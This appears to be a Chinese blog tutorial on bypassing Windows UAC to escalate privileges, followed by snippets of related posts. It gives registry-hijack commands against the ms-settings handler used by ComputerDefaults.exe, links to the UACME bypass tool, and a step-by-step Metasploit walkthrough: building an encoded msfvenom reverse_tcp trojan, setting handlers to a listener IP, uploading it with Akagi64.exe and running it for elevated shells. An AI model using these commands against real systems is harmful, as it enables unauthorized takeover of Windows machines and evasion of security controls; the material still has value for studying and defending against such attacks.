UAC绕过提权

已于 2023-11-19 20:43:08 修改
阅读量320 收藏
点赞数
分类专栏: # 内网渗透-提权 文章标签: 网络安全
于 2023-11-18 15:01:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65554829/article/details/134469986
版权
UAC:用户账户控制 (User Account Control )
         开启用户账户控制后,每个需要使用管理员访问令牌的应用都必须提示征得用户同意。 UAC 限制所有用户非 RID 500 的管理员用户 使用标准用户登录到他们的计算机,并在标准用户的安 全性上下文中访问资源和运行应用。 系统会为其创建两个单独的访问令牌:标准用户访问令牌和管理员访问令牌。 标准用户访问令牌用于启动不执行管理任务的应用程序(标准用户应用程序)。当 管理员需要执行高权限管理任务时, Windows 会自动提示用户予以批准,同意后则允许使用管理员访问 令牌。

UAC白名单

        即不询问直接启动的应用,如 slui.exewusa.exetaskmgr.exemsra.exe、 eudcedit.exe、eventvwr.exe.CompMgmtLauncher.exe rundll32.exe explorer.exe

白名单程序特性:Manifest 数据中 autoElevate 属性的值为 True;可以用Sigcheck检测。

UAC绕过

以ComputerDefaults.exe为例

sigcheck.exe /accepteula -m C:\Windows\System32\ComputerDefaults.exe

找出所有具有autoElevate 属性的程序并定向输出到

strings.exe /accepteula -s C:\Windows\System32\*.exe | findstr /i "autoElevate" > 1.txt
        使用进程监控器 process monitor 监控某白名单程序进程的所有操作行为,发现进程会先查询注册表A的数据,但是查不到,就会去查B的,再查不到,就继续去查C。我们在注册表A中将要执行的攻击载荷路径分别写入 默认 值和 “DelegateExecute” 值。
ComputerDefaults.exe为例
sigcheck.exe /accepteula -m C:\Windows\System32\ComputerDefaults.exe
使用进程监控器 process monitor 监控 ComputerDefaults.exe 进程的所有操作行为

添加注册表

reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /d "C:\windows\system32\cmd.exe" /f
reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /v DelegateExecute /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
HKCU的注册表当前用户可修改;标准用户对该注册表键值有修改权限,并且对 HKCU 的修改会自动同步到 HKCR。

工具

官网地址(下载慢)

Sigcheck https://learn.microsoft.com/zh-cn/sysinternals/downloads/sigcheck
Strings https://learn.microsoft.com/en-us/sysinternals/downloads/strings

国内地址(下载快)

https://download.csdn.net/download/m0_65554829/88547642

利用UACME提权

gethub地址:https://github.com/hfiref0x/UACME/releases/tag/v3.6.5

私人地址:直接下载链接https://dl-download.csdn.net/down11/20231117/f8e7781624a66d6da9f3aa87a9831e28.zip?Expires=1700230423&OSSAccessKeyId=STS.NTSjB9EvV4Wkv8XYapjniF2VB&Signature=jZr3NJnxc%2FyHFi9opG%2BI3ieHy4s%3D&response-content-disposition=attachment%3Bfilename%3D%22UACME-3.6.3%2520%25E5%25B7%25B2%25E7%25BC%2596%25E8%25AF%2591.zip%22&Date=1700230423&security-token=CAISgwJ1q6Ft5B2yfSjIr5fmIfiNqKl3g5WAdB7pvWElZuFFqff9oDz2IHxFf3FoCOEYv%2Fk1nWlU6%2FoTlqF%2FTIBDQUvNYZPPSiHRJFrzDbDasumZsJYw6vT8a1fxZjf%2F2MjNGaCbKPrWZvaqbX3diyZ32sGUXD6%2BXlujQ%2BDr6Zl8dYY4UxX6D1tBH8wEAgp5tI1gQhm3D%2Fu2NQPwiWf9FVdhvhEG6Vly8qOi2MaRmHG85R%2FYsrZJ%2FtuvecD%2FMJI3Z8kvC4uPsbYoJvab4kl58ANX8ap6tqtA9Arcs8uVa1sruEnXaLKMo4wxfVIjP%2FFmRvIVtprnieY9tuiWkJ%2Fs25qImF%2BBkY61GoABrSvSxqN%2BO2SKDSI3ekkKA1i9Da7Vb8LjUDMiDPrdLALwtIOSkNTZC0QoVf4%2B7g3mqTCNTJX%2BsdEFlZDDzBnZJwnYu4g4ITkhSgknKJexR0n6GcNjC6mme3257nISthAe2YDb4JJQcHsc5y5Xb0f8KwDe2l5lkhmhQk2JhT6g2AQgAA%3D%3D

工具介绍

        UACME是一个专用于绕过Windows UAC的开源项目,目前已包含了70多种Bypass UAC的方法。

步骤

环境搭建

net user test1 /add

net localgroup administrators test1 /add

钓鱼绕过提权

#将MSF生成的payload.exe上传到目标服务器并运行payload.exe

msfconsole

#在msf开启监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.150.129
set lport 8888
run

getuid

shell

chcp 65001

net user test1

#尝试添加用户#失败

net user test2 /add

upload ~/upgrade/UACME-3.6.3 c:/phpstudy_pro/WWW/pikachu/vul/rce/uac

#生成一个新木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.150.129 lport=7777 -i 3 -e x86/shikata_ga_nai -f exe -o 7777.exe

#上传木马

upload ~/7777.exe ./

upload ~/upgrade/Akagi64.exe ./

#进入shell

shell

chcp 65001

#另开一个终端设置监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.150.129
set lport 7777
run

#运行木马

.\Akagi64.exe 33 .\7777.exe

akagi.exe [Key] [Param]
#Key ,指定要使用的方法的编号
#Param ,指定绕过 UAC 后要运行的程序或命令,默认启动一个关闭了 UAC CMD 窗口
操作系统权限提升(十三)之绕过UAC提权-MSF和CS绕过UAC提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-25 1445
该模块会创建一个可执行文件,目标机器会运行一个发起提升权限请求的程序,提示用户是否要继续运行,如果用户选择继续运行程序,就会返回一个system权限的shell。这个模块对用户没有要求,点击通过即可,但是会创建一个恶意文件,对该文件进行免杀即可。使用该模块提权的使用,当前用户必须是管理员组中的用户,UAC为默认设置。拿到一个普通管理员的SHELL,在CS中没有*号代表有UAC。执行添加用户的命令时显示拒绝访问。使用CS自带的插件进行绕过提权提权后可以完成添加用户的命令。生成一个MSF的SHELL。
Windows提权笔记-UAC绕过详解
墨痕诉清风的博客
03-12 402
用户帐户控制(UAC)是Microsoft在Windows Vista和Windows Server 2008中引入的访问控制系统。尽管UAC已经被讨论和调查了很长时间,但必须强调的是,微软并不认为它是一个安全边界。相反,UAC强制应用程序和任务在非管理帐户的上下文中运行,直到管理员授权提升的访问权限。它将阻止安装程序和未经授权的应用程序在没有管理帐户权限的情况下运行,并阻止对系统设置的更改。通常,UAC的效果是,任何希望执行具有潜在系统范围影响的操作的应用程序都不能默默地执行。至少在理论上是这样。
window绕开UAC——利用UAC白名单程序提权
甜筒八部 的专栏
11-18 7942
Se在实际开发过程中,可以通过Process Explorer检查服务或程序处于哪个Session,会不会遇到Session 0 隔离问题。我们在Services 中找到之前加载的AlertService 服务,右键属性查看其Session 状态。
绕过UAC提权
谢公子的博客
02-14 8091
UAC UAC(User Account Control,用户账号控制)是微软为了提高系统安全性在Windows Vista中引入的技术。UAC要求用户在执行可能影响计算机运行的操作或在进行可能影响其他用户的设置之前,拥有相应的权限或者管理员密码。UAC在操作启动前对用户身份进行验证,以避免恶意软件和间谍软件在未经许可的情况下在计算机上进行安装操作或者对计算机设置进行更改。在Windows Vi...
UACWhitelistTool 使用教程
最新发布
gitblog_00714的博客
08-19 430
UACWhitelistTool 使用教程 UACWhitelistTool???? UAC 白名单小工具!项目地址:https://gitcode.com/gh_mirrors/ua/UACWhitelistTool 项目介绍 UACWhitelistTool 是一个开源的 Windows 工具,用于管理 UAC(用户账户控制)白名单。通过将特定应用程序添加到白名单,可以避免这些程序在运行时触发 U...
UAC绕过思路(未完)
weixin_30788731的博客
09-08 356
---恢复内容开始--- What is UAC? 程序启动后,UAC的流程图: 如果关闭UAC,则程序会提权运行。 Privilege Contents: 参考:https://msdn.microsoft.com/en-us/library/windows/desktop/bb530716%28v=vs.85%29.aspx?f=255&MSPPError=...
操作系统权限提升(十五)之绕过UAC提权-基于白名单DLL劫持绕过UAC提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-26 1566
先将操作在本地执行,使用procmon进行监控,过滤DLL和 NAME NOT FOUND ,寻找可以替换的DLL文件,注意文件的权限是否可以在目录写入,可以看到在C盘的tools目录的文件中有一个srrstr.dll被调用,但是没有加载,我们生成恶意的DLL文件看看是否可以被劫持。在Windows中许多应用程序并不是一个完整的可执行文件,它们被分割成一些相对独立的动态链接库文件,即dll文件,放置于系统中,个人理解类似于我们编程中引入的模块。将我们生成的DLL文件改名为我们要劫持的DLL文件名。
操作系统权限提升(十四)之绕过UAC提权-基于白名单AutoElevate绕过UAC提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-26 1498
利用白名单程序的本质实际上是劫持注册表,这种方法主要是通过寻找autoElevated属性为true的程序,修改其注册表command的值,改成我们想要执行的paylaod,在该值中指明的字段会在这类程序运行时自动执行,类似于默认程序打开,当你以后运行该程序时,这个command命令都会自动执行。我们在运行eventvwr.exe,程序会在注册表下去找这些值,如果这些值是一个calc的程序,那么系统在运行eventwr.exe时就会去执行一个calc.exe。我们打开注册表,去找到刚刚那个注册表的位置。
操作系统权限提升(十二)之绕过UAC提权-Windows UAC概述
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-03 3040
UAC(User Account Control),中文翻译为用户帐户控制,是微软在Windows Vista和Windows7中引用的新技术,主要功能是进行一些会影响系统安全的操作时,会自动触发UAC,用户确认后才能执行。因为大部分的恶意软件、木马病毒、广告插件在进入计算机时都会有如:将文件复制到Windows或Program Files等目录、安装驱动、安装ActiveX等操作,而这些操作都会触发UAC,用户都可以在UAC提示时来禁止这些程序的运行
C++ UAC 提权 以一个管理员身份运行程序-附件资源
03-02
C++ UAC 提权 以一个管理员身份运行程序-附件资源
UAC白名单设置_软件加使用方法
05-27
用户账户控制(UAC)白名单的设置 Windows7下 UAC(User Account Control,用户帐户控制)是微软为提高系统安全而在Windows Vista中引入的新技术,它要求用户在执行可能会影响计算机运行的操作或执行更改影响其他用户的设置的操作之前,提供权限或管理员?密码。通过在这些操作启动前对其进行验证,UAC 可以帮助防止恶意软件和间谍软件在未经许可的情况下在计算机上进行安装或对计算机进行更改。 从Vista开始,微软开始这一新的安全工具吧,算是。对于一部分非法程序,UAC确实可以在一定程度上对其进行防范。但是,对于很多用户来说,这个功能也带来了很多困扰。 所以就想有没有白名单之类的功能,可以将我们信任的程序直接允许运行。答案是有的。但是微软没有自带,哈哈。 网上的答案绝大多数都是停止UAC,废话,如果想停止的话就不会有人问这个问题了。 可以通过微软公司出品的Microsoft Application Compatibility Toolkit 5.6将信任程序加入系统白名单。 下载Application Compatibility Toolkit 安装成功有三个程序 以管理员的权限运行Compatibility Administrator 在Custom DataBases中新建数据库,添加一个Application Fix(下面空白出点击右键,creat new) 添上你的程序名,版本,程序路径 选择none 下一步 选中RunAsInvoker 完成 在菜单栏里选择file->save。。。保存为一个sdb文件 file->install
通过Bypass UAC进行权限提升
内心不种满鲜花就会长满杂草
01-30 4704
用户账户控制(User Account control,UAC)是windows系统采用的一种控制机制,可以阻止自动安装未经授权的应用 并防止意外更改系统设置,有助于防止恶意软件损坏计算机。用户账户控制程序使应用程序和任务始终在非管理员账户的安全上下文中运行,除非管理员专门授权管理员级别的权限。开启用户账户控制后,每个需要使用管理员访问令牌的应用都必须征得用户同意。UAC限制所有用户包括非RID500的管理员用户使用标准用户登录到他们的计算机,并在标准用户的安全性上下文中访问资源和运行应用。
可以绕过 Windows UAC
langshanglibie的专栏
01-31 1689
Windows 系统安全机制并非固若金汤。通过 COM 提升名称方法,程序可以绕过其核心安全机制 UAC 而获取到系统管理员权限。
Bypass UAC 提权
LYSM
06-30 3915
背景 UAC(User Account Control)是微软在 Windows Vista 以后版本引入的一种安全机制,通过 UAC,应用程序和任务可始终在非管理员帐户的安全上下文中运行,除非管理员特别授予管理员级别的系统访问权限。UAC 可以阻止未经授权的应用程序自动进行安装,并防止无意中更改系统设置。 UAC需要授权的动作包括:配置Windows Update;增加或删除用户账户;改变用户的账户类型;改变UAC设置;安装ActiveX;安装或移除程序;安装设备驱动程序;设置家长控制;将文件移动或复制到
UAC学习之路
weixin_42282189的博客
12-31 687
作者: Crlt_TT豆 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x01 什么是uacUAC 用于允许管理员用户不对每个执行的进程授予管理员权限这是作为管理员UAC提升执行,如果成功完成,特权令牌用于创建进程。 这里为了区分低权限高权限的进程,微软使用了强制性完整性控制MIC MIC介绍 查看自己当前的完整性级别 whoami /groups 接下来我们以该级别创建一个文件 现在我们以管理员cmd给予test.txt最高的系统权限 可以看见我们对该文件是有.
Windows权限提升—BypassUAC、DLL劫持、引号路径、服务权限等提权
剁椒鱼头没剁椒的博客
03-29 1962
关于Windows提权应该这篇总结完就结束了,再次提醒一下关于第三方软件或插件提权,不是不写,而且有些软件都会自动更新,很多漏洞基本上很少遇到,同时也利用不了,比如说:向日葵有一个版本能够提权,但是现在那个版本装再电脑上,根本连接不上向日葵的服务器,更何谈提权呢,同时还可以看日志,目前日志也更改了,端口不会再日志中出现了。前面几篇文章我就汇总在下面了,同时关于UAC提权之前一篇文章写的没那么细,这里重新补充一下。Windows权限提升—令牌窃取、UAC提权、进程注入等提权
程序跳过UAC研究及实现思路
热门推荐
daiafei
12-26 1万+
网上很对跳过UAC资料都是说如果让UAC弹出窗体,并没有真正跳过弹窗,这里结合动态提权+计划任务实现真正意义上的跳过UAC弹窗,运行程序的时候可以不出现UAC窗体,并且程序还是以高权限运行。 vista及其以后系统多程序的安全进行了控制,经过允许的程序才能执行,但是每次运行程序都弹出UAC控制窗体很烦人,网上看了一些资料,大致归纳出两种方案: 方案一:程序自身具备高权限(win7下带有
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值